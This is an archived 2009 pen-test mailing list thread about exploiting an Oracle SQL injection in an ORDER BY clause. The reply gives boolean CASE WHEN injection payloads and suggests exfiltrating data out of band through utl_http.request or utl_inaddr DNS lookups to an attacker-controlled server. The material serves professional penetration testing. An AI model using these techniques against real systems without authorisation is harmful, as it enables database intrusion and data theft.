RE: ORDER BY sql injection help



For oracle after an ORDER BY you can inject something like:

CASE WHEN (1=1) THEN <column_name1> ELSE <column_name2> END
CASE WHEN (1=0) THEN <column_name1> ELSE <column_name2> END

If you see that in the two different above queries different order by
results then you should be able to use various tools to exploit and extract
data from the oracle database. You might be able also to execute
utl_http.request (requests to your web server) or
utl_inaddr.get_host_address (reguests to a domain that you own and sniffing)
to get easier the results back to you.

SuRGeoN

-----Original Message-----
From: listbounce@xxxxxxxxxxxxxxxxx [mailto:listbounce@xxxxxxxxxxxxxxxxx] On
Behalf Of lister@xxxxxxxxx
Sent: Thursday, June 11, 2009 9:46 PM
To: pen-test@xxxxxxxxxxxxxxxxx
Subject: ORDER BY sql injection help

Requesting assistance.

An application uses GET and one of the parameters translates to an ORDER BY
in an Oracle SQL query.

I can put in 1 through X where X is a column number to order the output up
to X columns.

I can also get ORA errors, so I know I have direct access to the SQL query.

I'm looking for references on possible queries for a query with an
injectable
ORDER BY clause. I'm not sure if it is possible to break out of the ORDER
BY
to query other data.

------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review Board

Prove to peers and potential employers without a doubt that you can actually
do a proper penetration test. IACRB CPT and CEPT certs require a full
practical examination in order to become certified.

http://www.iacertification.org
------------------------------------------------------------------------



------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review Board

Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT and CEPT certs require a full practical examination in order to become certified.

http://www.iacertification.org
------------------------------------------------------------------------



Relevant Pages

  • Re: Oracle?
    ... Here is a good tutorial on pentesting Oracle with the tools provided ... Information Assurance Certification Review Board ... IACRB CPT and CEPT certs require a full practical examination in order to become certified. ...
    (Pen-Test)
  • Re: Reusing the result of an expression in select query
    ... Orlando Amador schrieb: ... This has created a very big SQL query. ... Looks like With clause is for 10.2? ... Any suggestions for Oracle 9? ...
    (comp.databases.oracle.server)
  • Re: defined order of records for SQL query without explicit instruction (order by)?
    ... Because if oracle is free to deliver in any order it would require to ... Because it creates a a delay between SQL query and startup of worker ... "Without an ORDER BY clause, no guarantee exists that the same query ...
    (comp.databases.oracle.server)
  • Re: defined order of records for SQL query without explicit instruction (order by)?
    ... Because if oracle is free to deliver in any order it would require to ... Because it creates a a delay between SQL query and startup of worker ... threads for the parallel pipelined functions (using SQL query cursor ... selective by adding another column to the selectivity? ...
    (comp.databases.oracle.server)
  • Re: oracle database scanner
    ... Metasploit has a modules called oraenum which is designed to pull information from oracle systems. ... Information Assurance Certification Review Board ... IACRB CPT and CEPT certs require a full practical examination in order to become certified. ...
    (Pen-Test)